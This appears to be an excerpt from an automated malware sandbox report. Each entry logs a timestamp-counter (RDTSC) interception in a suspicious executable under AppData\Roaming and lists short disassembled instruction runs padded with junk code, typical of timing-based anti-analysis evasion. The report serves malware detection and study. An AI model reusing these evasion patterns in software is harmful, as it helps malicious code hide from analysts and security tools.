Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D45E36 second address: D45E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D45CAC second address: D45CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D61915 second address: D6191A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6191A second address: D61937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC3h 0x00000009 jnl 00007F0E948C9FB6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D61937 second address: D6193B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6193B second address: D61941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D606E0 second address: D606E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60A28 second address: D60A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60A2E second address: D60A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E94F51A4Ah 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0E94F51A55h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60A5B second address: D60A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60D3A second address: D60D4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60D4A second address: D60D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D60D66 second address: D60D70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D611C6 second address: D611CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D611CC second address: D611D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D611D7 second address: D611DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D63036 second address: D6303A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D688B1 second address: D688D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007F0E948C9FC7h 0x0000000e jmp 00007F0E948C9FC1h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6896E second address: D68985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F0E94F51A46h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68985 second address: D689F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC2h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c and edx, dword ptr [ebp+122D1C73h] 0x00000012 push 00000004h 0x00000014 jne 00007F0E948C9FC6h 0x0000001a call 00007F0E948C9FB9h 0x0000001f jmp 00007F0E948C9FBEh 0x00000024 push eax 0x00000025 jmp 00007F0E948C9FC6h 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jne 00007F0E948C9FB6h 0x00000037 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D689F7 second address: D68A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F0E94F51A46h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68A0F second address: D68A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68CA3 second address: D68CC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68CC3 second address: D68CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D68CC7 second address: D68CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: D6C086 second address: D6C08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0EFC second address: 4EA0F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0F00 second address: 4EA0F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E4016C second address: 4E4017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E4017C second address: 4E4019F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F0E948C9FC4h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B5D second address: 4E60B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B63 second address: 4E60B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B67 second address: 4E60B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B6B second address: 4E60B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F0E948C9FC2h 0x0000000f pop edi 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0E948C9FC3h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60B9F second address: 4E60BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60BC4 second address: 4E60BD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60BD7 second address: 4E60BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 72h 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E6076F second address: 4E6077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E60676 second address: 4E6068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E6068C second address: 4E606D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov edx, 397F1680h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E948C9FC2h 0x00000015 xor si, 34C8h 0x0000001a jmp 00007F0E948C9FBBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esp], ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov di, si 0x0000002a jmp 00007F0E948C9FBAh 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E6046C second address: 4E604A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E94F51A55h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E604A0 second address: 4E604A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E604A6 second address: 4E604C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E604C5 second address: 4E604C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70121 second address: 4E70125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70125 second address: 4E70142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70142 second address: 4E70163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E94F51A52h 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70163 second address: 4E7017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E7017A second address: 4E7017E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E7017E second address: 4E70182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70182 second address: 4E70188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0DEF second address: 4EA0E34 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E948C9FC8h 0x00000008 add ch, 00000028h 0x0000000b jmp 00007F0E948C9FBBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007F0E948C9FC6h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0E34 second address: 4EA0E8A instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F0E94F51A4Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F0E94F51A50h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0E94F51A4Dh 0x0000001f and si, AE56h 0x00000024 jmp 00007F0E94F51A51h 0x00000029 popfd 0x0000002a mov eax, 4261EBC7h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E801FC second address: 4E8025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E948C9FC1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, dx 0x00000016 pushfd 0x00000017 jmp 00007F0E948C9FBFh 0x0000001c xor eax, 71CF5DBEh 0x00000022 jmp 00007F0E948C9FC9h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E8025B second address: 4E80260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80260 second address: 4E80294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0E948C9FBDh 0x0000000a add si, E7F6h 0x0000000f jmp 00007F0E948C9FC1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80294 second address: 4E80298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80298 second address: 4E8029E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E8029E second address: 4E802A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E802A4 second address: 4E80302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c jmp 00007F0E948C9FC6h 0x00000011 popad 0x00000012 and dword ptr [eax], 00000000h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F0E948C9FBAh 0x0000001c sbb eax, 2055C2A8h 0x00000022 jmp 00007F0E948C9FBBh 0x00000027 popfd 0x00000028 mov edx, eax 0x0000002a popad 0x0000002b and dword ptr [eax+04h], 00000000h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0E948C9FC1h 0x00000036 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605B9 second address: 4E605BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605BD second address: 4E605C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605C1 second address: 4E605C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605C7 second address: 4E605CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605CD second address: 4E605D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605D1 second address: 4E605F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E948C9FC2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605F0 second address: 4E605F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605F4 second address: 4E605FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E605FA second address: 4E6065C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F0E94F51A52h 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F0E94F51A50h 0x00000018 mov ebp, esp 0x0000001a jmp 00007F0E94F51A50h 0x0000001f pop ebp 0x00000020 pushad 0x00000021 pushad 0x00000022 mov dh, al 0x00000024 mov cx, dx 0x00000027 popad 0x00000028 call 00007F0E94F51A55h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70C81 second address: 4E70C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70C93 second address: 4E70C97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70C97 second address: 4E70CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E948C9FBCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E948C9FBAh 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70CBD second address: 4E70CCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E70CCC second address: 4E70D19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F0E948C9FBEh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 mov edi, eax 0x00000015 jmp 00007F0E948C9FC8h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80068 second address: 4E80080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A54h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E80080 second address: 4E800E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov edi, 69104580h 0x00000010 jmp 00007F0E948C9FC9h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F0E948C9FC3h 0x00000020 and eax, 38C36A0Eh 0x00000026 jmp 00007F0E948C9FC9h 0x0000002b popfd 0x0000002c mov ah, A3h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E800E5 second address: 4E800EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E800EB second address: 4E800EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0624 second address: 4EA0649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A4Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0649 second address: 4EA0707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E948C9FC7h 0x00000009 xor al, 0000007Eh 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 popfd 0x00000012 mov bh, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push esi 0x0000001a mov eax, edi 0x0000001c pop edi 0x0000001d mov di, si 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F0E948C9FBAh 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov bx, 06C0h 0x0000002e popad 0x0000002f push ecx 0x00000030 jmp 00007F0E948C9FC4h 0x00000035 mov dword ptr [esp], ecx 0x00000038 pushad 0x00000039 movzx esi, di 0x0000003c pushfd 0x0000003d jmp 00007F0E948C9FC3h 0x00000042 adc cx, 1D4Eh 0x00000047 jmp 00007F0E948C9FC9h 0x0000004c popfd 0x0000004d popad 0x0000004e mov eax, dword ptr [76FA65FCh] 0x00000053 pushad 0x00000054 call 00007F0E948C9FBCh 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
